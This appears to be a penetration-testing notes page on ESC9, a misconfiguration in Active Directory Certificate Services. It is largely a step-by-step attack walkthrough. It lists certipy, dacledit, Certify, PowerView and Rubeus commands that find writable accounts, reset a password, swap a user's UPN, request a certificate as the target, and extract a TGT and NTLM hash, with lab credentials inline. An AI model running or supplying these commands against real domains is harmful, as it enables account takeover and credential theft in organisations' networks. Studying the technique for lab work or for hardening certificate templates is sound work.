ESC9
ESC | Active Directory Certificate Services
If the msPKI-Enrollment-Flag
attribute of a certificate template includes the CT_FLAG_NO_SECURITY_EXTENSION
flag, it prevents the addition of the szOID_NTDS_CA_SECURITY_EXT
security extension to certificates issued from that template.
An attacker can exploit the loophole in certificate mapping by misusing privileges and manipulating a user’s User Principal Name (UPN).
UPN Manipulation User Principal Name can be changed to match the UPN of another account or target.
Requesting a certificate Using those legit credentials or original UPN, request a certificate on behalf of that user.
Certificate Mapping Associate issued certificate matching the altered UPN.
Result Attacker has valid certificate mapped to target account.
# Find vulnerabilities
certipy-ad find -u '[email protected]' -p 'Password123!' -dc-ip 10.129.228.236 -vulnerable -stdout
# Showing
[!] Vulnerabilities
ESC9 : 'LAB.LOCAL\\Domain Users' can enroll and template has no security extension
If we want to compromise user3 we need to have FullControl rights over any account. We can modify user2's UPN to match our target user3's UPN. Then request certificate as user2 and we will receive the certificate for user3.
Find FullControl rights account
dacledit.py -action read -dc-ip 10.129.205.199 lab.local/blwasp:Password123! -principal blwasp -target user2
Add extra password with Shadow Credentials
certipy shadow auto -u '[email protected]' -p 'Password123!' -account user2
Modify UPN user2 to target UPN of user3.
certipy account update -u '[email protected]' -p 'Password123!' -user user2 -upn [email protected]
Request certificate with user2
certipy req -u '[email protected]' -hashes 2b576acbe6bcfda7294d6bd18041b8fe -ca lab-LAB-DC-CA -template ESC9
Revert back to user2
certipy account update -u '[email protected]' -p 'Password123!' -user user2 -upn [email protected]
Authenticate with certificate and get TGT and hash
certipy auth -pfx user3.pfx -domain lab.local
ESC9 Abuse from Windows
Enumeration with Certify.exe
# Certify
.\Certify.exe find /vulnerable
# Check if registry is set to 1
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc
# Or CertificateMappingMethods is 0x4
reg query HKLM\System\CurrentControlSet\Control\SecurityProviders\Schannel\
# With powerview check privileges
$blwasp=(Get-DomainUser -Identity blwasp)
Get-DomainObjectAcl -LDAPFilter "(&(objectClass=user)(objectCategory=person))" -ResolveGUIDs | ? {($_.ActiveDirectoryRights -contains "GenericAll" -or $_.ActiveDirectoryRights -contains "GenericWrite") -and $_.SecurityIdentifier -eq $blwasp.objectsid}
Attack from Windows
# Password reset
Set-DomainUserPassword -Identity user2 -AccountPassword $((ConvertTo-SecureString 'Newpassword123!' -AsPlainText -Force)) -Verbose
# Change user2 UPN to match user 3
Set-DomainObject user2 -Set @{'userPrincipalName'='[email protected]'} -Verbose
# Request Certificate using ESC9 and alt SAN user3
.\Certify.exe request /ca:LAB-DC.lab.local\lab-LAB-DC-CA /template:ESC9 /altname:user3
# Conver to pfx
& "C:\Program Files\OpenSSL-Win64\bin\openssl.exe" pkcs12 -in .\user3.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out user3.pfx
# Get ticket TGT as user3
.\Rubeus.exe asktgt /user:user3 /certificate:user3.pfx /getcredentials /nowrap
Last updated
Was this helpful?